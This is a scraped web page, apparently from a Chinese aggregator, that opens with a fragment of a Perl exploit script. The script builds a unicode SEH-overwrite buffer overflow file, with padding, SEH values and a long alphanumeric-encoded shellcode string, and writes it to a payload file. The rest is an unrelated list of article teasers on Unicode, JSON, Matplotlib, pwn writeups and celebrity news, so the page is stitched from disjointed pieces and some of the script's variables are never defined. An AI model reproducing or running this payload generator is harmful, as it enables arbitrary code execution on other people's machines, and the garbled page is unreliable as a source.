"\x70"x113;#注意相加减得到的差 要除2 my $buf =("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYIZKUKXYRTMTJTNQZ27BSGNQ8I34TKD1NPDK46LLDKRVML4KQ6LHTK3NO04KNVOHPOMHBUL3PYKQXQKO9QQP4K2LMTO4TKPEOL4K1DMXBXM1ZJ4KOZN84KPZMPKQJKK3P4Q9DKNT4KKQZNNQKONQY0KLVLU47PBTKWWQXOLMM1WWJKJTOK3LNDMX459QDK1JMTM1JK36TKLL0KDKQJMLM1ZKTKLDTKKQJHTIOTO4MLQQ8C7BLHMYHTSYK5E9WRS8TN0NLNZL22IXUOKOKOKOU9OULDWKCNIHZB3CTGMLMT22YXDNKOKOKOU9PEKXBH2LBLO011RHP3P2NN1TQXRU2SC52R4H1LO4KZ3YJFPVKO25KTE98B20WKUX6B0MWL4GMLND229X1QKOKOKO1X1TP0MSQHQXMS2P1QBNNQIKCX1LO4KW4IYSQX1T00MS28QXNC2P1Q2NNQI9THPLNDKWCYYQNQZ21BPSR1PRKOXPNQWPB0KO0ULHA");
#panda0#
$junk = "A"x235; my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf)); my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE); unicode exp学习相关推荐
- Unicode以及字符集转换
曾经碰到一个问题, 项目需要支持日文操作系统,但是没有编译成unicode程序. 然后在一个解析用户输入路径的地方出问题了. 原因是日文的"表"这个汉字,日文编码格式下,低字节和反 ...
- python对json的操作总结
Json简介:Json,全名 JavaScript Object Notation,是一种轻量级的数据交换格式.Json最广泛的应用是作为AJAX中web服务器和客户端的通讯的数据格式.现在也常用于h ...
- sprintboot 后端将音频流写入到前端播放_freac for mac(音频和CD格式转换器)
freac for mac中文版让您可以轻松地将音频CD翻录为MP3或M4A文件,与硬件播放器一起使用,或者转换不与其他音频软件一起播放的文件,freac支持CDDB / freedb在线CD数据库. ...
- buuoj Pwn writeup 246-250
246 pwnable_echo1 结构简单. 功能1 就是个输入输出.但是显然有个栈溢出. 功能2功能3没有. 啥保护没有,就栈溢出就完了.可以直接rop,它开了NX.也可以shellcode. 写 ...
- python画名侦探柯南_机器学习机器学习三剑客之Matplotlab
Matplotlib 是Python 2D绘图领域的基础套件,它让使用者将数据图形化,并提供多样化的输出格式.这里将会以四个小案例探索Matplotlib的常见用法 绘制折线图 import matp ...
- 机器学习之Matplotlib
Matplotlib 是Python 2D绘图领域的基础套件,它让使用者将数据图形化,并提供多样化的输出格式.这里将会以四个小案例探索Matplotlib的常见用法 绘制折线图 折线图 import ...
- 机器学习入门三剑客之Matplotlib
[机器学习入门三剑客之Matplotlib](https://www.jianshu.com/p/f2782e741a75) matplotlib Matplotlib 是Python 2D绘图领域的 ...
- 机器学习三剑客之Matplotlab
Matplotlib 是Python 2D绘图领域的基础套件,它让使用者将数据图形化,并提供多样化的输出格式.这里将会以四个小案例探索Matplotlib的常见用法 绘制折线图 import matp ...
- 技巧篇:scanf触发malloc_consolidate进行unlink(chunk size限制得到极小的chunk)
前言:之前刷过这样的题,由于时间原因忘的差不多了,这里捡起两道不相似类型的题进行了大佬的exp学习,这里就不重写exp了,很好理解.一个off-by-one 一个off-by-null off-by- ...
最新文章
- 谷歌最新论文:手机端的实时3-D目标检测
- python怎么打印出文件的内容,python怎么将打印输出日志文件
- Brocade光纤交换机FOS升级
- 飞桨PaddleOCR环境搭建
- Jdk1.8新特性(一) 接口的default方法
- 【含义解析】%d{yyyy-MM-dd HH:mm:ss.SSS} [%thread] %-5level %logger{50} - %m%n
- OPENSSL的基础使用
- python 图表_用 Python 让你的数据图表动起来
- eclipse idea对比_Idea必须配置的环境变量(自己总结)
- Reporting service 技巧
- python电脑配置-入门学python需要什么配置的电脑?
- base64编码在silverlight中的使用
- win10 没有计算机策略,Win10家庭版找不到组策略gpedit.msc的解决方法
- dell服务器全系列手册,DELL服务器 RAID配置中文手册.pdf
- 目的路径太长如哈删除_文件名超长导致文件无法删除怎么办?
- marker 上的气泡 callout的使用
- 免费视频教程!零基础学Python系列(7) - 数据类型之bytes(上)
- 软件加密系统Themida应用程序保护指南(七):外挂插件
- Unity 打包图集
- 范冰冰登顶2013福布斯名人榜 孙俪升74名